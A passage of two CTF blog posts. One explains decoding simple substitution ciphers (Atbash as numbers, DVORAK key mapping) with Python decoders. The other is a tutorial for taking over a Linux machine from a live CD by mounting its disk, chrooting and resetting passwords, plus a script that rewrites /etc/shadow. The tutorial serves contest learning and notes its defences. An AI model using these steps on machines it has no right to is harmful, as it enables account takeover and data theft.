Crypto Cracking

Well, round 2 of InCTF 2012 was a blast! There was lots to do and considering that 2 of my team-mates had very limited internet access, I had to do quite a lot of heavy-lifting.

The challenges were fun and varied, ranging from Reverse-Engineering to Website Hacking. But the category that elicited the most interest from me was the Cryptography challenge. Having an old love affair with puzzles and ciphers, I got cracking.

Sadly, I do not have the questions with me as the 2nd round portal has been deactivated; however, I can still explain the approach to cracking them.

The premise was that you are a decoder in a top-secret intelligence agency that has an agent who has infiltrated a dangerous terrorist outfit. The agent's job is to relay the outfit's encrypted messages to you, and your job is to decode them and save the world.

In the first question, a.k.a. the 1st transmission, we were given the encrypted message and our job was to find the location of the next meeting place of the terrorist leaders. You might have played the newspaper game that involves deciphering a message by substituting characters and looking for common words and patterns in order to figure out the cipher; that was the stratagem I applied, and it works here because a simple substitution preserves the letter frequencies and word lengths of the plaintext. On closer inspection, the cipher turns out to be pretty simple:

“Each alphabetic character has been replaced by its numerical equivalent from the reverse alphabet, i.e. if a=1, b=2..z=26, then in the encrypted message you’ll have a=26,b=25..z=1.”

So all I had to do was write a program that maps each number back to a letter. If a number n appears in the ciphertext, the plaintext letter is the one at position 27 - n (counting a = 1), which in ASCII terms is chr(ord('a') + 26 - n); so 26 becomes a and 1 becomes z. This is the classic Atbash cipher (a and z swapped, b and y swapped, and so on), just written as numbers instead of letters. Running that over the whole transmission prints out the complete legible message.
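A decoder for the first transmission, as an added example and not the contest's or the author's program. It assumes the ciphertext is integers 1 to 26 separated by whitespace with a "/" token between words (the real transmission's separators are unknown), refuses anything outside 1..26 instead of emitting garbage, and, going a little beyond the post, also includes the letter form of the same cipher (Atbash) and a symbol count, which is the frequency step of the manual attack described above. The sample sentence in the demo is constructed.

```python
"""Decoder for the 'reverse alphabet as numbers' cipher from the first transmission.

Added example, not the contest's or the author's code. Assumptions: the
ciphertext is a sequence of integers 1..26 separated by whitespace, and words
are separated by a '/' token; the real challenge's separators are unknown.
"""
from collections import Counter


def decode_reverse_numbers(ciphertext):
    """Map each number n (a=26 ... z=1) back to the letter at position 27-n
    (a=1), i.e. chr(ord('a') + 26 - n). '/' marks a word boundary and other
    non-numeric tokens are passed through. Out-of-range numbers raise
    ValueError rather than silently producing non-letters."""
    out = []
    for token in ciphertext.split():
        if token == "/":
            out.append(" ")
        elif token.isdigit():
            n = int(token)
            if not 1 <= n <= 26:
                raise ValueError(f"symbol {n} is outside 1..26")
            out.append(chr(ord("a") + 26 - n))
        else:
            out.append(token)  # punctuation etc. left as-is
    return "".join(out)


def encode_reverse_numbers(plaintext):
    """Inverse of decode_reverse_numbers, used to check the decoder: the letter
    at position p (a=1) becomes 27-p. Non-letters are dropped."""
    words = []
    for word in plaintext.lower().split():
        nums = [str(26 - (ord(c) - ord("a"))) for c in word if c.isalpha()]
        words.append(" ".join(nums))
    return " / ".join(words)


def atbash(text):
    """The same cipher written with letters instead of numbers (Atbash):
    a<->z, b<->y, ... Case is preserved, non-letters untouched, self-inverse."""
    out = []
    for c in text:
        if "a" <= c <= "z":
            out.append(chr(ord("a") + ord("z") - ord(c)))
        elif "A" <= c <= "Z":
            out.append(chr(ord("A") + ord("Z") - ord(c)))
        else:
            out.append(c)
    return "".join(out)


def symbol_frequencies(ciphertext):
    """Count each numeric symbol: the first step of the manual attack. In
    English text the top symbols are the images of e, t, a (22, 7, 26 here)."""
    return Counter(t for t in ciphertext.split() if t.isdigit())


if __name__ == "__main__":
    # Constructed sample transmission, not the contest's actual text.
    sample = encode_reverse_numbers("meet at the old mill at dawn")
    print(sample)
    print(symbol_frequencies(sample).most_common(3))
    print(decode_reverse_numbers(sample))
```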

Question 1: CRACKED!

The second question was even easier than the first, on account of the hint mentioning that the agent had used a DVORAK keyboard to type the message. Simple pattern recognition tells you that all the capital letters still conform to the QWERTY keyboard, whereas all the lower-case characters were typed on a DVORAK layout by someone thinking in QWERTY: the agent pressed the key where the letter sits on a QWERTY board, and the machine emitted whatever DVORAK assigns to that physical key. So it was simply a physical translation of keys: replace each ciphertext character with the QWERTY label of the key that produces it on DVORAK. 🙂

Immediately fired up Wikipedia and got the layout of the DVORAK keyboard. This allowed me to do the translation in a matter of minutes. Of course, I did not decipher the whole message, just the location of the next meeting.
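The key translation described above, as an added example that is not from the original post: the two layouts are written out row by row so that the same string index means the same physical key, after which decoding is one dictionary lookup per character. It assumes US QWERTY and US DVORAK, models only the three main letter rows (the number row is identical apart from the bracket and minus keys, which are left out), and leaves capital letters alone as the post observed. The sample message is constructed.

```python
"""Undo a message typed on a DVORAK layout by someone thinking in QWERTY.

Added example, not the author's code. The "cipher" is a fixed mapping between
physical keys on two layouts, so it is a plain monoalphabetic substitution:
each ciphertext character is whatever DVORAK assigns to the key that carries
the intended character on a QWERTY keyboard. Assumptions: US QWERTY and US
DVORAK, the three main letter rows only, and capital letters unaffected.
"""

# Same string index == same physical key (rows left to right, top to bottom).
QWERTY = "qwertyuiop[]" "asdfghjkl;'" "zxcvbnm,./"
DVORAK = "',.pyfgcrl/=" "aoeuidhtns-" ";qjkxbmwvz"
assert len(QWERTY) == len(DVORAK) == 33

TO_DVORAK = dict(zip(QWERTY, DVORAK))  # what the machine emitted
TO_QWERTY = dict(zip(DVORAK, QWERTY))  # what the agent meant


def typed_on_dvorak(plaintext):
    """Simulate the agent: press the QWERTY key for each character and emit
    the DVORAK character on that key. Characters not on the modelled keys
    (capitals, digits, space) pass through unchanged."""
    return "".join(TO_DVORAK.get(c, c) for c in plaintext)


def decode_dvorak(ciphertext):
    """Recover the intended text: every character that DVORAK puts on a
    modelled key is replaced by the QWERTY label of that key. Note that this
    deliberately turns a '.' into 'e' and a ',' into 'w', because under the
    post's model a literal '.' can only mean the agent pressed the QWERTY 'e'
    key; capitals, digits and spaces pass through."""
    return "".join(TO_QWERTY.get(c, c) for c in ciphertext)


if __name__ == "__main__":
    # Constructed sample, not the contest's transmission.
    message = "Agent 7 reports: meeting at the old mill at dawn"
    wire = typed_on_dvorak(message)
    print(wire)
    print(decode_dvorak(wire))
```

Letters that sit on the same key in both layouts (a and m) survive the translation unchanged, which is one of the patterns that gives the scheme away when you compare the ciphertext against common English words.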

Question 2: CRACKED! Feeling good.

Sadly, that is as long as the good feeling lasted. The next two questions were supposedly easy, but since the cryptographic code was written in Python, I could not make heads or tails of what the code was doing. And since I had never worked with Python, I didn't even have a clue as to how to run the darn code. 😛

Well, no issues. I did my part, with my team managing a rank of 16 in the 2nd round. Now looking forward to the 3rd round and some serious Flag-Capturing!!

Eviva! 😀

Breaking Into Linux

Let’s get this straight: This is just a tutorial for a competition I am participating in called India Capture The Flag or InCTF for short. I do not like, nor do I endorse cracking of other people’s systems and/or stealing of private and confidential data. I believe in building stuff, not tearing down things like password-protections.

Now that the disclaimer is out of the way, let’s do this!

There’s a really easy way to hack (or what I prefer to call “crack”) a person’s Linux machine, even if they have a GRUB password. A GRUB password only stops someone from editing the boot entries (for example to boot straight into a root shell); it does nothing to protect the files on the disk once you boot something else. The only things that actually stop what follows are a firmware password that locks the boot order and, above all, full-disk encryption, because then the partition we mount below is unreadable without the passphrase.

And all it needs is a Live CD. Any distro should do, but generally people prefer to use the Live CD of the same distro they are trying to crack into.

Just insert the live CD into your disk tray and reboot the system, making sure that booting from the optical drive has a higher priority than booting from the hard drive. Then, on boot-up, select the “Try Live CD without making any changes” option and enter the live session.

The first thing you should do is what every Linux lover does: run the terminal. Type “sudo fdisk -l” into it to list all the disks and partitions in the system (“lsblk -f” also works and shows the filesystem type, which helps to tell the root partition from swap or a separate /boot). You should be able to see which partition holds the original Linux installation. Make sure you note down this partition. For this hack, we’ll assume it to be /dev/sda1.

Now comes the easy part. Having obtained the path to the primary partition, we create a mount point with “sudo mkdir /media/temp”. Since this is a live boot, this directory is created in the live system’s RAM-backed filesystem, not on the hard drive. Still not breaking anything.

This is where it gets interesting. We now mount the primary partition on our temporary directory, so that its filesystem appears under /media/temp. Just type “sudo mount /dev/sda1 /media/temp” into the terminal and we’re done.

Finally!! We’ve done all the preparation. We’ve stalked our prey like the merciless hunters we are. It’s now time to go in for the kill. Running “sudo chroot /media/temp” creates a shell with a different root directory, and passing /media/temp as the parameter gives us our primary partition as that new filesystem. Because the live session’s root user is root on the target filesystem too, that shell is already root there, and any changes made in it are reflected directly in the primary partition. OH YEAH!!

Now it’s just a trivial matter of running “passwd” inside that shell to set root’s password to the desired one (or “passwd username” for a particular account; no sudo is needed, since the chrooted shell is already root). Then all we have to do is exit the chroot, unmount the partition with “sudo umount /media/temp”, reboot, and we’ll have complete control over the machine.
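The procedure above, as an added example that is not part of the original post and written in Python rather than as the shell commands the post uses: it performs the password reset by editing the mounted partition's /etc/shadow directly, which is what passwd does underneath, so it also works when chroot fails (different architecture, no /proc). It adds the check a practitioner would want before touching anything, namely that the partition mounted at the given path really is a root filesystem and not /boot or /home, and writes the file atomically. The mount point, user name, hash value and sample shadow file are all constructed for the demonstration; in practice the hash comes from `openssl passwd -6`.

```python
"""Offline password reset against a Linux root filesystem mounted at ROOT.

Added example, not the post's commands. It does what the chroot + passwd step
does, but edits ROOT/etc/shadow directly from the live session, so no chroot
is needed. The hash is generated separately and passed in, e.g.
`openssl passwd -6 'newpass'`. Assumptions: standard 9-field shadow format;
ROOT is the mount point from the post (e.g. /media/temp); the caller is root
on the live system. All paths, user names and hashes below are constructed.
"""
import os
import shutil
import tempfile
import time
from pathlib import Path

SHADOW_FIELDS = 9  # user:hash:lastchg:min:max:warn:inactive:expire:flag


def looks_like_linux_root(root):
    """Guard against editing the wrong partition (/boot, /home or swap have
    no etc/shadow). Checked before anything is modified."""
    root = Path(root)
    return (root / "etc" / "shadow").is_file() and (root / "etc" / "passwd").is_file()


def set_shadow_hash(root, user, new_hash, today=None):
    """Replace USER's hash in ROOT/etc/shadow and set the 'last changed'
    field to TODAY (days since the epoch, which is what passwd writes).
    Returns the new shadow line. Raises ValueError for a non-root partition
    and KeyError if the user does not exist on the target."""
    if not looks_like_linux_root(root):
        raise ValueError(f"{root} does not look like a Linux root filesystem")
    if today is None:
        today = int(time.time() // 86400)
    shadow = Path(root) / "etc" / "shadow"
    lines = shadow.read_text().splitlines()
    new_line = None
    for i, line in enumerate(lines):
        fields = line.split(":")
        if len(fields) != SHADOW_FIELDS or fields[0] != user:
            continue
        fields[1] = new_hash
        fields[2] = str(today)
        new_line = ":".join(fields)
        lines[i] = new_line
        break
    if new_line is None:
        raise KeyError(f"user {user!r} not found in {shadow}")
    # Write a sibling temp file, keep shadow's mode (normally 0640), then swap
    # atomically so an interrupted write cannot leave a truncated shadow.
    tmp = shadow.with_suffix(".tmp")
    tmp.write_text("\n".join(lines) + "\n")
    shutil.copymode(shadow, tmp)
    os.replace(tmp, shadow)
    return new_line


def make_sample_root(root):
    """Constructed minimal root filesystem for the demo. The hashes are
    placeholders, not real SHA-512-crypt digests."""
    etc = Path(root) / "etc"
    etc.mkdir(parents=True, exist_ok=True)
    (etc / "passwd").write_text(
        "root:x:0:0:root:/root:/bin/bash\n"
        "agent:x:1000:1000:Field Agent:/home/agent:/bin/bash\n"
    )
    (etc / "shadow").write_text(
        "root:$6$rootsalt$OLDROOTHASH:19000:0:99999:7:::\n"
        "daemon:*:19000:0:99999:7:::\n"
        "agent:$6$oldsalt$OLDAGENTHASH:19000:0:99999:7:::\n"
    )
    os.chmod(etc / "shadow", 0o640)


def demo(user="agent", new_hash="$6$newsalt$NEWHASH", today=15000):
    """Run the reset against the constructed root in a temporary directory
    and return the resulting shadow file contents."""
    with tempfile.TemporaryDirectory() as d:
        make_sample_root(d)
        set_shadow_hash(d, user, new_hash, today=today)
        return (Path(d) / "etc" / "shadow").read_text()


if __name__ == "__main__":
    print(demo())
```

The third field is also the defender's tell: a password that changed on a day the owner did not change it is exactly what this leaves behind in /etc/shadow, and the same edit with "!" prefixed to the existing hash is how you lock an account instead of taking it over.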

Congratulations! You are now a Linux Hacker.